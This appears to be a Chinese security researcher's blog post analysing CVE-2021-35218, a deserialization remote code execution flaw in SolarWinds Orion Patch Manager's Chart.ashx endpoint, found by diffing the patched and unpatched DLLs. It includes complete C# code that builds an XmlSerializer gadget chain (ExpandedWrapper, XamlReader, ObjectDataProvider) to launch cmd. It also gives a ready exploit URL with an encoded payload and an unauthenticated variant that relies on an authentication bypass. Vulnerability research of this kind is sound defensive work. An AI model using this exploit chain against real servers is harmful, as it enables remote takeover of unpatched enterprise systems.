警告
本文最后更新于 2021-10-29,文中内容可能已过时。
卷
目前这篇文章中报的RCE,和作者沟通了一下发现只剩下CVE-2021–35218没有分析出来了,硬看实在看不出来,所以本文使用diff dll的形式进行比对,最终找到了漏洞点所在。
我使用的是JustAssembly,将新旧版本拷贝出来做比对。作者对CVE的描述是
CVE-2021–35218: Patch Manager Orion Platform Module: Chart Endpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability
所以我们只关注Patch Manager自身的dll以及Chart相关的功能点。
diff之后发现漏洞出现在SolarWinds.PM.Web.dll中。
具体类为SolarWinds.PM.Web.Charting.ScmChartImageHandler。
左边是补丁之后的,右边是没打补丁的。一个很明显的XmlSerializer反序列化。
没打补丁之前type直接从request中获取
打补丁之后,type从_friendlyTypes中获取
_friendlyTypes是一个白名单
所以漏洞点肯定在这里。接下来我们需要寻找对应的路由,使用vscode的全局搜索找到Orion/PM/Chart.ashx
Chart.ashx继承自ScmChartImageHandler,而ScmChartImageHandler实现了IHttpHandler接口,是一个handler,对于所有的请求都会走ProcessRequest。
那么我们直接发包就行了,接下来构造poc。
没啥好说的,看过我写的dotnet反序列化文章的应该都懂。不懂的看一下这篇文章 https://github.com/Y4er/dotnet-deserialization/blob/main/XmlSerializer.md
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
| using System;
using System.Collections.Specialized;
using System.Data.Services.Internal;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Text;
using System.Web;
using System.Windows.Data;
using System.Windows.Markup;
using System.Xml.Serialization;
namespace ConsoleApp1
{
class Program
{
static void Main(string[] args)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd";
psi.Arguments = "/c ping localhost -t";
StringDictionary dict = new StringDictionary();
psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
Process p = new Process();
p.StartInfo = psi;
ObjectDataProvider odp = new ObjectDataProvider();
odp.MethodName = "Start";
odp.IsInitialLoadEnabled = false;
odp.ObjectInstance = p;
string xamlpayload = XamlWriter.Save(odp);
//Console.WriteLine(xamlpayload);
ExpandedWrapper<XamlReader, ObjectDataProvider> expandedWrapper = new ExpandedWrapper<XamlReader, ObjectDataProvider>();
expandedWrapper.ProjectedProperty0 = new ObjectDataProvider();
expandedWrapper.ProjectedProperty0.MethodName = "Parse";
expandedWrapper.ProjectedProperty0.MethodParameters.Add(xamlpayload);
expandedWrapper.ProjectedProperty0.ObjectInstance = new XamlReader();
XmlSerializer xmlSerializer = new XmlSerializer(expandedWrapper.GetType());
using (MemoryStream memoryStream = new MemoryStream())
{
using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress))
{
xmlSerializer.Serialize(deflateStream, expandedWrapper);
deflateStream.Flush();
deflateStream.Close();
string text = Base64Encode(memoryStream.ToArray());
Console.WriteLine(text);
}
}
Console.ReadKey();
}
public static string Base64Encode(byte[] str)
{
return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
}
public static byte[] Base64Decode(string str)
{
byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
}
}
}
|
然后发包
1
| http://192.168.137.131:8787/Orion/PM/Chart.ashx?tp=System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&chart=bFpSTmo5b3dFSWJ2bGZvZkxCLzJSc3kyVWc4aFlWVUpWa0xhRDlUZHFuc2RiQU91L0JIWnd5YW82bi92QkFpd0ltcTd0MlRlMTU2Wlp5WXBiaHBuMmF1T3lRUmY4dXRzeUcvR0h6OFUwNllDcjdUNkVhR3FkSHhjdm9DejN6UW9lbDc4MUJJbmdEQ1A0ZFZRaE5FZFB1Vk5NaVZmSTFhNUVIVmRaL1huTE1TVitEUWNYb3VYKzdzbnVkWU9Cc1luQkM4MVA1NVMvejdGcVNiR0Nrclk1dGFLSHFncTNBNTNjVkwyUmMwT2R6TXFKY2R0cFV0K3Fwc3owYm52TmE2RGVnQ254M09JU1JmaUxQTEdRekxGa1BnYzRxU0EzejdUM1dkSnFJYzhZVFIreGNkWEZrYzlpRTRKU3Y2RUVKR3pXWnA1Z3dic1hRQTE5YkN3bWxEY2drMGRuQ09ZdEtPUU1tZGtEQ2tzTVpQQmlkcjRaZE9TK2lJYWFsTlVVU2Z0RVpCbTJlRnQ2VW9iQjU0eXB3cWt6cCsyQ2JYTEpnWldQaVEwTW8wZ0plMFdkbHZ1dGVObzNwZWZYNjF3MU45KzluWStuWkd3a1VQcWxDNGoyWTdTekMvRHBYYVUyTmU0MmpqcW1WQUp5U3FhQUxOQmdsMVRaMnhBa01ucUZVUTFqVEhFcVpkQmthZmt2NXI4WVdQdDc1UGhjWVBWQnZzYzM1T08rOEZ4TmlkVWRZanFYSjhFQjhhM2FqdkkxazFsTG8zVngySGUwc3YrQnVrVTdXSFhrZmhidStLU2p2aHZzajNPVmlyRVlYbTdMUmU5YTE2STNpK3RFTy82TFl6L0FBPT01
|
RCE了。
和作者沟通他说未授权是要结合CVE-2020-10148身份验证绕过来打的,我试了试没成,暂时先放着。
未授权源于CVE-2020–10148,补丁中只修复了非GET请求的未授权。
所以未授权rce的payload
1
| GET /orion/PM/Chart.ashx/Skipi18n?tp=<type>&chart=<serialized data> HTTP/1.1
|
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
